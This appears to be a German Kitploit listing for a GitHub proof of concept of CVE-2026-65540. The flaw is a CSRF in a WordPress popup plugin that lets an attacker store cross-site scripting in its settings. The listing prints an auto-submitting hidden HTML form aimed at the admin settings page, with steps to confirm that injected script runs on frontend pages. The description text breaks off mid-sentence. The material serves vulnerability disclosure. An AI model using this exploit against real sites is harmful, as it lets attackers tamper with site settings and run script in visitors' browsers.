Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-65540 — Popup für CF7 mit Sweet Alert <= 1.6.5 - Cross-Site Request Forgery | Kitploit
Tools/GitHubGitHub/testardou/cve-2026-65540
Web-SchwachstellenscannerSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheit
GitHubtestardou/cve-2026-65540

CVE-2026-65540

Popup für CF7 mit Sweet Alert <= 1.6.5 - Cross-Site Request Forgery

Repository anzeigen
vor 14h 33mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-65540

Popup für CF7 mit Sweet Alert <= 1.6.5 - Cross-Site Request Forgery

Plugin-URL

https://wordpress.org/plugins/cf7-sweet-alert-popup/

Beschreibung

Der Einstellungs-Handler des Plugins enthält einen Logikfehler bei der Nonce-Verifizierung, der den gesamten CSRF-Schutz deaktiviert. Ein nicht authentifizierter Angreifer kann dies ausnutzen, indem er einen authentifizierten Administrator dazu verleitet, eine bösartige Seite mit einem versteckten, automatisch übermittelten Formular zu besuchen, und so die Plugin-Einstellungen beliebig ändert.
Die übermittelten Werte werden ohne Bereinigung gespeichert und auf jeder Frontend-Seite über wp_head unverändert in einen

POC

  1. Hosten Sie die folgende HTML-Seite auf einem separaten Server:
root@kitploit:~
<!DOCTYPE html>
<html>
<body>
<h1>Hello</h1>

<form style="visibility:hidden" action="http://TARGET/wp-admin/admin.php?page=cf7-simplepopup"
      method="POST" id="csrf" target="hiddenframe">
  <input name="cf7simplePopupWidth" value="500;alert(document.domain)">
  <input name="cf7simplePopupNonce" value="invalid_nonce">
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>
  1. Melden Sie sich als Administrator bei WordPress an
  2. Besuchen Sie die bösartige Seite
  3. (Optional) Navigieren Sie zu http://TARGET/wp-admin/admin.php?page=cf7-simplepopup — bestätigen Sie, dass das Feld Width nun 500;alert(document.domain) enthält
  4. Besuchen Sie eine beliebige Frontend-Seite — alert(document.domain) wird im Browser ausgeführt, was das gespeicherte XSS bestätigt
Tool herunterladen